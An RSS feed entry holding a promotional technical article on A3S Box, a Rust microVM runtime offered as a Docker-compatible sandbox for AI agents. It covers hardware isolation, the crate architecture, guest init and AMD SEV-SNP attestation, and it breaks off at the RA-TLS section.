<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Roy Lin</title>
    <description>The latest articles on Forem by Roy Lin (@roylin).</description>
    <link>https://forem.com/roylin</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F711611%2F79264972-aaa1-458d-a8d1-d2f409b3e441.png</url>
      <title>Forem: Roy Lin</title>
      <link>https://forem.com/roylin</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/roylin"/>
    <language>en</language>
    <item>
      <title>A 40MB MicroVM Runtime Written in Rust — A Perfect Docker Replacement for AI Agent Sandboxes</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 19:12:22 +0000</pubDate>
      <link>https://forem.com/roylin/a-40mb-microvm-runtime-written-in-rust-a-perfect-docker-replacement-for-ai-agent-sandboxes-3dei</link>
      <guid>https://forem.com/roylin/a-40mb-microvm-runtime-written-in-rust-a-perfect-docker-replacement-for-ai-agent-sandboxes-3dei</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;When we strip away all the technical jargon and return to the essence of computing, a core question emerges: &lt;strong&gt;Can we run every workload on its own operating system kernel while maintaining container-level startup speed and developer experience?&lt;/strong&gt; A3S Box answers with a definitive yes — a single 40MB binary, no daemon, 200ms cold start, 52 Docker-compatible commands, hardware-level isolation, and optional confidential computing.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Introduction: Why We Need to Rethink Container Runtimes&lt;/li&gt;
&lt;li&gt;First Principles: Starting from the Fundamental Question&lt;/li&gt;
&lt;li&gt;Architecture Overview: Seven Crates in Precise Collaboration&lt;/li&gt;
&lt;li&gt;Core Value 1: True Hardware-Level Isolation&lt;/li&gt;
&lt;li&gt;Core Value 2: Confidential Computing and Zero-Trust Security&lt;/li&gt;
&lt;li&gt;Core Value 3: MicroVM with 200ms Cold Start&lt;/li&gt;
&lt;li&gt;Core Value 4: Full Docker-Compatible Experience&lt;/li&gt;
&lt;li&gt;Core Value 5: Secure Isolation Sandbox for AI Agents&lt;/li&gt;
&lt;li&gt;Deep Dive: VM Lifecycle State Machine&lt;/li&gt;
&lt;li&gt;TEE Confidential Computing: The Trust Chain from Hardware to Application&lt;/li&gt;
&lt;li&gt;Vsock Communication Protocol: The Bridge Between Host and Guest&lt;/li&gt;
&lt;li&gt;OCI Image Processing Pipeline: From Registry to Root Filesystem&lt;/li&gt;
&lt;li&gt;Network Architecture: Three Flexible Modes&lt;/li&gt;
&lt;li&gt;Guest Init: PID 1 Inside the MicroVM&lt;/li&gt;
&lt;li&gt;Warm Pool: The Ultimate Solution to Cold Starts&lt;/li&gt;
&lt;li&gt;Seven-Layer Defense-in-Depth Security Model&lt;/li&gt;
&lt;li&gt;Observability: Prometheus, OpenTelemetry, and Auditing&lt;/li&gt;
&lt;li&gt;Kubernetes Integration: CRI Runtime&lt;/li&gt;
&lt;li&gt;SDK Ecosystem: Unified Rust, Python, and TypeScript&lt;/li&gt;
&lt;li&gt;Comparative Analysis with Existing Solutions&lt;/li&gt;
&lt;li&gt;Future Outlook and Summary&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. Introduction: Why We Need to Rethink Container Runtimes
&lt;/h2&gt;

&lt;p&gt;Over the past decade, Docker and container technology have fundamentally transformed how software is delivered. Developers can package applications and their dependencies into a standardized image and run it in any environment that supports a container runtime. This "build once, run anywhere" philosophy has dramatically improved development efficiency and deployment consistency.&lt;/p&gt;

&lt;p&gt;However, as cloud-native architectures have matured, the fundamental limitations of traditional container runtimes have become increasingly apparent:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The shared-kernel security dilemma.&lt;/strong&gt; Traditional containers (such as those created by runc, Docker's default runtime) are essentially Linux kernel process-isolation mechanisms — resources are partitioned through namespaces and cgroups. But all containers share the same host kernel, so a single kernel vulnerability (such as CVE-2022-0185 or CVE-2022-0847, "Dirty Pipe") can allow an attacker to escape from any container to the host, gaining control over all workloads on the same node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The trust crisis in multi-tenant environments.&lt;/strong&gt; In public cloud and edge computing scenarios, workloads from different tenants run on the same physical hardware. Even with container isolation, there is no hardware-level trust boundary between tenants. Cloud service provider administrators can theoretically access any tenant's in-memory data — which is unacceptable when handling medical records, financial data, or personal privacy information.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The performance-security tradeoff.&lt;/strong&gt; Existing solutions either sacrifice performance for security (traditional VMs take seconds to tens of seconds to start) or sacrifice security for performance (containers provide insufficient isolation strength). Projects like Kata Containers and Firecracker attempt to find a balance between the two, but each still has its own limitations.&lt;/p&gt;

&lt;p&gt;A3S Box was created precisely to fundamentally resolve this contradiction.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;📖 For complete documentation and API reference, visit: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  2. First Principles: Starting from the Fundamental Question
&lt;/h2&gt;

&lt;p&gt;To understand A3S Box's design decisions, we need to set aside analogies and conventions, return to the most basic facts, and reason upward from there. Let's re-examine "running a workload" through this lens.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 What Is the Essence of Workload Isolation?
&lt;/h3&gt;

&lt;p&gt;From a physics perspective, isolation means there are no channels for information leakage between two systems. In computing, this means:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Memory isolation&lt;/strong&gt;: Workload A cannot read or write workload B's memory space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Execution isolation&lt;/strong&gt;: Workload A's code execution does not affect workload B's execution flow&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;I/O isolation&lt;/strong&gt;: Workload A's input/output cannot be intercepted or tampered with by workload B&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal isolation&lt;/strong&gt;: Workload A's resource consumption does not cause performance degradation for workload B&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Traditional containers only implement these isolations at the operating system level — through the kernel's namespace and cgroup mechanisms. But the kernel itself is shared, meaning the strength of isolation depends on the correctness of the kernel code. The Linux kernel has over 30 million lines of code, with hundreds of security vulnerabilities discovered each year. Relying on such a massive codebase to guarantee isolation is fundamentally unreliable.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Hardware Isolation Is the Only Fundamental Solution
&lt;/h3&gt;

&lt;p&gt;If we cannot trust software to provide perfect isolation, the only option is to leverage hardware. Modern processors provide two levels of hardware isolation:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 1: Virtualization extensions (Intel VT-x / AMD-V / Apple HVF).&lt;/strong&gt; The processor distinguishes between host mode (VMX root) and guest mode (VMX non-root) at the hardware level. Code running in guest mode cannot directly access the host's memory or devices; any sensitive operation triggers a VM Exit, handled by the host's VMM (Virtual Machine Monitor). This provides much stronger guarantees than OS-level isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 2: Memory encryption (AMD SEV-SNP / Intel TDX).&lt;/strong&gt; Going further, modern processors can hardware-encrypt a virtual machine's memory. Even an attacker with physical access (including cloud service provider administrators) cannot read the plaintext data in VM memory. This is what's known as "Confidential Computing."&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 A3S Box's Core Insight
&lt;/h3&gt;

&lt;p&gt;A3S Box's core insight can be summarized in one sentence:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;MicroVM + Confidential Computing + Container Experience = Unity of Security and Efficiency&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Specifically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One MicroVM per workload&lt;/strong&gt;: Using libkrun to start a lightweight virtual machine in ~200ms, each workload has its own independent Linux kernel. This is not container-level "fake isolation" but hardware-enforced true isolation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optional confidential computing&lt;/strong&gt;: On hardware supporting AMD SEV-SNP, the MicroVM's memory is hardware-encrypted. Even if the host machine is completely compromised, attackers cannot read data inside the MicroVM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker-compatible user experience&lt;/strong&gt;: 52 Docker-compatible commands — developers don't need to learn new tools. &lt;code&gt;a3s-box run nginx&lt;/code&gt; is as simple as &lt;code&gt;docker run nginx&lt;/code&gt;, but with a completely different security model underneath.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination of these three elements makes A3S Box not an incremental improvement over existing container runtimes, but a paradigm shift — from "process isolation with a shared kernel" to "hardware isolation with independent kernels."&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 Why libkrun?
&lt;/h3&gt;

&lt;p&gt;When choosing a virtualization backend, A3S Box selected libkrun over QEMU and Firecracker. The choice followed a deliberate technical evaluation:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;QEMU&lt;/th&gt;
&lt;th&gt;Firecracker&lt;/th&gt;
&lt;th&gt;libkrun&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Startup time&lt;/td&gt;
&lt;td&gt;Seconds&lt;/td&gt;
&lt;td&gt;~125ms&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory overhead&lt;/td&gt;
&lt;td&gt;Tens of MB&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~10 MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code complexity&lt;/td&gt;
&lt;td&gt;Very high (millions of lines)&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Low (library form)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS support&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Not supported&lt;/td&gt;
&lt;td&gt;Native HVF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux support&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Embedding method&lt;/td&gt;
&lt;td&gt;Separate process&lt;/td&gt;
&lt;td&gt;Separate process&lt;/td&gt;
&lt;td&gt;Library call&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;libkrun's unique advantage is that it is a &lt;strong&gt;library&lt;/strong&gt; rather than a standalone process. This means A3S Box can embed the VMM directly into its own process space, reducing inter-process communication overhead, while providing native support on macOS through Apple Hypervisor Framework (HVF) — which is critical for developer experience, as many developers use macOS for daily development.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Architecture Overview: Seven Crates in Precise Collaboration
&lt;/h2&gt;

&lt;p&gt;A3S Box is written in Rust, with the entire project consisting of seven crates, 218 source files, 1,466 unit tests, and 7 integration tests. This modular design follows the "minimal core + external extensions" architectural philosophy.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Crate Topology
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────────────┐
│                        a3s-box-cli                              │
│                  52 Docker-compatible commands                   │
│                       (361 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│                       a3s-box-sdk                               │
│              Rust / Python / TypeScript SDK                     │
├──────────────────────┬──────────────────────────────────────────┤
│   a3s-box-cri        │           a3s-box-runtime                │
│  Kubernetes CRI      │  VM lifecycle, OCI, TEE, networking      │
│                      │           (678 tests)                    │
├──────────────────────┴──────────────────────────────────────────┤
│                       a3s-box-core                              │
│        Config, error types, events, Trait definitions           │
│                       (331 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│  a3s-box-shim        │        a3s-box-guest-init                │
│  libkrun bridge shim │  Guest PID 1 / Exec / PTY / Attestation  │
├──────────────────────┴──────────────────────────────────────────┤
│                      libkrun-sys                                │
│                   libkrun FFI bindings                          │
└─────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Crate Responsibilities
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-core (Core Layer)&lt;/strong&gt;: Defines all core abstractions — configuration structs, error types (&lt;code&gt;BoxError&lt;/code&gt; enum with 15 variants), event system, and key Trait interfaces. This is the "contract layer" of the entire system; all other crates depend on it, but it depends on no other A3S crates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-runtime (Runtime Layer)&lt;/strong&gt;: Implements VM lifecycle management, OCI image pulling and caching, TEE confidential computing, network configuration, warm pool, auto-scaling, and other core functionality. This is the most complex crate in the system, with 678 unit tests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-cli (CLI Layer)&lt;/strong&gt;: Provides 52 Docker-compatible commands and is the primary interface for user interaction with the system. It translates user commands into calls to the runtime layer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-shim (VMM Bridge Layer)&lt;/strong&gt;: Runs as an independent subprocess, responsible for calling the libkrun FFI interface to create and manage MicroVMs. This process-isolation design ensures that a VMM crash does not affect the main process.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-guest-init (Guest Initialization)&lt;/strong&gt;: Compiled as a static binary, runs as PID 1 inside the MicroVM. Responsible for mounting filesystems, configuring networking, and starting Exec/PTY/Attestation servers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-cri (Kubernetes Integration Layer)&lt;/strong&gt;: Implements the CRI (Container Runtime Interface) protocol, allowing A3S Box to run as a Kubernetes RuntimeClass.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-sdk (SDK Layer)&lt;/strong&gt;: Provides an embedded Rust SDK, and generates Python and TypeScript bindings via PyO3 and napi-rs respectively.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Core Trait System
&lt;/h3&gt;

&lt;p&gt;A3S Box's extensibility is built on a set of carefully designed Traits. These Traits define the system's extension points, and each Trait has a default implementation to ensure the system works out of the box:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Trait&lt;/th&gt;
&lt;th&gt;Responsibility&lt;/th&gt;
&lt;th&gt;Default Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;VmmProvider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Start VM from InstanceSpec&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;VmController&lt;/code&gt; (shim subprocess)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;VmHandler&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Lifecycle operations for running VMs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ShimHandler&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ImageRegistry&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OCI image pulling and caching&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RegistryPuller&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CacheBackend&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Directory-level LRU cache&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RootfsCache&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MetricsCollector&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Runtime metrics collection&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;RuntimeMetrics&lt;/code&gt; (Prometheus)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;TeeExtension&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TEE attestation, sealing, key injection&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SnpTeeExtension&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AuditSink&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audit event persistence&lt;/td&gt;
&lt;td&gt;JSON-lines file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CredentialProvider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Registry authentication&lt;/td&gt;
&lt;td&gt;Docker config.json&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EventBus&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Event publish/subscribe&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EventEmitter&lt;/code&gt; (tokio broadcast)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The elegance of this design lies in the separation of concerns: the five core components remain stable and non-replaceable, while the fourteen extension points can evolve independently. Users can replace any extension without touching the core — the embodiment of the "minimal core + external extensions" principle.&lt;/p&gt;
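&lt;p&gt;The default-plus-override pattern behind these Traits can be illustrated with a short sketch (Python here for brevity; the real extension points are Rust Traits, and the names below are ours, not the project's):&lt;/p&gt;

```python
# Illustrative sketch of "minimal core + external extensions": every
# extension point ships with a default implementation, and callers may
# override it without touching the core. Names are hypothetical.

class ExtensionRegistry:
    def __init__(self):
        self._defaults = {}
        self._overrides = {}

    def register_default(self, point, impl):
        self._defaults[point] = impl

    def override(self, point, impl):
        if point not in self._defaults:
            raise KeyError(f"unknown extension point: {point}")
        self._overrides[point] = impl

    def resolve(self, point):
        # Fall back to the default so the system works out of the box.
        return self._overrides.get(point, self._defaults[point])

registry = ExtensionRegistry()
registry.register_default("AuditSink", lambda event: f"jsonl:{event}")
registry.register_default("CredentialProvider", lambda reg: "docker-config")

# Out of the box, the default is used...
assert registry.resolve("AuditSink")("exec") == "jsonl:exec"
# ...and a user can swap in a custom sink without touching the core.
registry.override("AuditSink", lambda event: f"syslog:{event}")
assert registry.resolve("AuditSink")("exec") == "syslog:exec"
```

&lt;p&gt;The point of the sketch is the fallback in &lt;code&gt;resolve&lt;/code&gt;: defaults keep the system usable with zero configuration, while overrides never require changes to the core.&lt;/p&gt;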




&lt;h2&gt;
  
  
  4. Core Value 1: True Hardware-Level Isolation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4.1 From Namespaces to Hypervisor
&lt;/h3&gt;

&lt;p&gt;The isolation model of traditional containers can be compared to "different rooms in the same building" — there are walls between rooms (namespaces), but they share the same foundation (kernel). If the foundation cracks, all rooms are affected.&lt;/p&gt;

&lt;p&gt;A3S Box's isolation model is "a separate building for each workload" — each MicroVM has its own Linux kernel, isolated from the host through hardware virtualization extensions (Intel VT-x / AMD-V / Apple HVF). Even if an attacker gains root privileges inside a MicroVM and exploits a kernel vulnerability, they can only affect that MicroVM itself — because the VM Exit mechanism ensures that any sensitive operation must be reviewed by the host's VMM.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Layered Isolation
&lt;/h3&gt;

&lt;p&gt;A3S Box doesn't rely solely on virtualization for isolation. It also stacks multiple OS-level isolation layers inside the MicroVM, forming a defense in depth:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────┐
│            Application Process           │
├─────────────────────────────────────────┤
│  Seccomp BPF │ Capabilities │ no-new-priv│  &amp;lt;- Syscall level
├─────────────────────────────────────────┤
│  Mount NS │ PID NS │ IPC NS │ UTS NS    │  &amp;lt;- Namespace level
├─────────────────────────────────────────┤
│  cgroup v2 (CPU/Memory/PID limits)      │  &amp;lt;- Resource limit level
├─────────────────────────────────────────┤
│           Independent Linux Kernel       │  &amp;lt;- Kernel level
├─────────────────────────────────────────┤
│     Hardware Virtualization (VT-x / AMD-V / HVF)  │  &amp;lt;- Hardware level
├─────────────────────────────────────────┤
│  AMD SEV-SNP / Intel TDX (optional)     │  &amp;lt;- Memory encryption level
└─────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This multi-layer stacking design means that even if one layer is breached, the attacker still faces obstacles from other layers. This is not "choose the strongest single layer," but "every layer increases the cost of attack."&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 Guest Init's Secure Boot Chain
&lt;/h3&gt;

&lt;p&gt;The PID 1 process inside the MicroVM (&lt;code&gt;a3s-box-guest-init&lt;/code&gt;) is a critical link in the security model. It is compiled as a statically linked Rust binary, with no dependency on any dynamic libraries, minimizing the attack surface.&lt;/p&gt;

&lt;p&gt;Guest Init startup sequence:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Mount base filesystems: &lt;code&gt;/proc&lt;/code&gt; (procfs), &lt;code&gt;/sys&lt;/code&gt; (sysfs), &lt;code&gt;/dev&lt;/code&gt; (devtmpfs)&lt;/li&gt;
&lt;li&gt;Mount virtio-fs shared filesystem (rootfs passed in from host)&lt;/li&gt;
&lt;li&gt;Configure network interface (via raw syscalls, no dependency on &lt;code&gt;iproute2&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Apply security policies (Seccomp, Capabilities, no-new-privileges)&lt;/li&gt;
&lt;li&gt;Start three vsock servers:

&lt;ul&gt;
&lt;li&gt;Port 4089: Exec server (command execution)&lt;/li&gt;
&lt;li&gt;Port 4090: PTY server (interactive terminal)&lt;/li&gt;
&lt;li&gt;Port 4091: Attestation server (TEE attestation, TEE mode only)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Wait for host connection&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The entire process requires no systemd, no shell, and no userspace tools — a minimal initialization flow designed for security.&lt;/p&gt;
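&lt;p&gt;As a rough illustration, the boot sequence above can be modeled as an ordered list of steps whose key invariants are checked explicitly (a Python model of the described behavior — the real PID 1 is a statically linked Rust binary, and the step names paraphrase the text):&lt;/p&gt;

```python
# Python model of the Guest Init boot order described above.
BOOT_STEPS = [
    "mount_base_filesystems",    # /proc, /sys, /dev
    "mount_virtiofs_rootfs",     # rootfs shared in from the host
    "configure_network",         # raw syscalls, no iproute2 dependency
    "apply_security_policies",   # seccomp, capabilities, no-new-privileges
    "start_vsock_servers",       # exec:4089, pty:4090, attestation:4091
    "wait_for_host",
]

VSOCK_PORTS = {"exec": 4089, "pty": 4090, "attestation": 4091}

def check_invariants(steps):
    # Filesystems must exist before networking is configured, and security
    # policies must be in force before any vsock server starts listening.
    order = {name: i for i, name in enumerate(steps)}
    assert order["configure_network"] > order["mount_base_filesystems"]
    assert order["start_vsock_servers"] > order["apply_security_policies"]
    return True

assert check_invariants(BOOT_STEPS)
```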




&lt;h2&gt;
  
  
  5. Core Value 2: Confidential Computing and Zero-Trust Security
&lt;/h2&gt;

&lt;h3&gt;
  
  
  5.1 What Is Confidential Computing?
&lt;/h3&gt;

&lt;p&gt;Confidential Computing is a hardware security technology that protects data while it is being processed (in-use). Traditional security measures protect data at rest (via disk encryption) and data in transit (via TLS), but data being processed typically exists in plaintext in memory.&lt;/p&gt;

&lt;p&gt;AMD SEV-SNP (Secure Encrypted Virtualization - Secure Nested Paging) changes this through the following mechanisms:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory encryption&lt;/strong&gt;: Each virtual machine has an independent AES encryption key, managed by the processor's security processor (PSP). The host's VMM cannot read the VM's memory in plaintext.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrity protection&lt;/strong&gt;: SNP adds memory integrity guarantees on top of SEV-ES, preventing the host from tampering with the VM's memory contents.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote attestation&lt;/strong&gt;: The VM can generate a hardware-signed attestation report, proving it is running on genuine AMD SEV-SNP hardware and that the initial memory contents (measurement) have not been tampered with.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  5.2 A3S Box's TEE Implementation
&lt;/h3&gt;

&lt;p&gt;A3S Box's TEE subsystem contains 12 modules, covering the complete chain from hardware detection to application-layer key management:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hardware detection&lt;/strong&gt;: At startup, A3S Box automatically probes the &lt;code&gt;/dev/sev-guest&lt;/code&gt;, &lt;code&gt;/dev/sev&lt;/code&gt;, and &lt;code&gt;/dev/tdx_guest&lt;/code&gt; device files, along with the &lt;code&gt;/sys/module/kvm_amd/parameters/sev_snp&lt;/code&gt; parameter. If hardware is unavailable but the &lt;code&gt;A3S_TEE_SIMULATE=1&lt;/code&gt; environment variable is set, it enters simulation mode — which is critical for development and testing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Attestation report generation&lt;/strong&gt;: When a verifier sends an &lt;code&gt;AttestationRequest&lt;/code&gt; containing a nonce and optional user_data, Guest Init combines them via SHA-512 into a 64-byte &lt;code&gt;report_data&lt;/code&gt;, then calls the &lt;code&gt;/dev/sev-guest&lt;/code&gt; device via &lt;code&gt;SNP_GET_REPORT&lt;/code&gt; ioctl to generate an attestation report. The report is 1184 bytes and contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Offset 0x00-0x04: version (u32 LE)        — report format version
Offset 0x04-0x08: guest_svn (u32 LE)      — guest security version number
Offset 0x08-0x10: policy (u64 LE)         — security policy flags
Offset 0x38-0x40: current_tcb             — trusted computing base version
Offset 0x90-0xC0: measurement (48 bytes)  — SHA-384 hash of initial memory
Offset 0x1A0-0x1E0: chip_id (64 bytes)   — physical processor unique identifier
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
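&lt;p&gt;Both the &lt;code&gt;report_data&lt;/code&gt; construction and the field layout above are mechanical enough to sketch (stdlib Python; the offsets are exactly those quoted above, while the function names are ours):&lt;/p&gt;

```python
import hashlib

def build_report_data(nonce, user_data=b""):
    # SHA-512 over nonce plus optional user_data yields exactly the
    # 64 bytes that SNP_GET_REPORT accepts as report_data.
    return hashlib.sha512(nonce + user_data).digest()

def parse_snp_report(report):
    # Field offsets follow the layout quoted above (1184-byte SNP report).
    assert len(report) == 1184, "unexpected report size"
    return {
        "version": int.from_bytes(report[0x00:0x04], "little"),
        "guest_svn": int.from_bytes(report[0x04:0x08], "little"),
        "policy": int.from_bytes(report[0x08:0x10], "little"),
        "current_tcb": int.from_bytes(report[0x38:0x40], "little"),
        "measurement": report[0x90:0xC0],    # SHA-384, 48 bytes
        "chip_id": report[0x1A0:0x1E0],      # 64 bytes
    }

assert len(build_report_data(b"verifier-nonce")) == 64
fields = parse_snp_report(bytes(1184))
assert len(fields["measurement"]) == 48
assert len(fields["chip_id"]) == 64
```

&lt;p&gt;Binding the verifier's nonce into &lt;code&gt;report_data&lt;/code&gt; is what makes the report fresh: a replayed report cannot contain a nonce the verifier just generated.&lt;/p&gt;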



&lt;p&gt;&lt;strong&gt;Certificate chain verification&lt;/strong&gt;: A3S Box implements complete AMD certificate chain verification:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD Root Key (ARK)          &amp;lt;- AMD's hardcoded root trust anchor
    |
    +-- AMD SEV Key (ASK)   &amp;lt;- Intermediate certificate
    |       |
    |       +-- VCEK        &amp;lt;- Chip-level certificate (unique per physical processor)
    |               |
    |               +-- SNP Report Signature  &amp;lt;- Attestation report signature
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Certificates are obtained from AMD's KDS (Key Distribution Service): &lt;code&gt;https://kds.amd.com/vcek/v1/{product}/{chip_id}&lt;/code&gt;, and cached locally to avoid repeated network requests.&lt;/p&gt;
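&lt;p&gt;A minimal sketch of that fetch-with-cache behavior (Python; the URL shape is the one quoted above — real KDS requests also append TCB version query parameters — and the on-disk cache layout is hypothetical):&lt;/p&gt;

```python
from pathlib import Path

def vcek_url(product, chip_id_hex):
    # URL shape as quoted above; real KDS requests also carry TCB
    # version query parameters.
    return f"https://kds.amd.com/vcek/v1/{product}/{chip_id_hex}"

def cached_vcek(product, chip_id_hex, cache_dir, fetch):
    # Keep certificates on disk so repeated attestations skip the network.
    path = Path(cache_dir) / f"{product}-{chip_id_hex}.der"
    if path.exists():
        return path.read_bytes()
    cert = fetch(vcek_url(product, chip_id_hex))
    path.write_bytes(cert)
    return cert
```

&lt;p&gt;The second lookup for the same chip is served from disk — worthwhile because a VCEK is unique per physical processor and effectively immutable.&lt;/p&gt;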

&lt;h3&gt;
  
  
  5.3 RA-TLS: Embedding Attestation into TLS
&lt;/h3&gt;

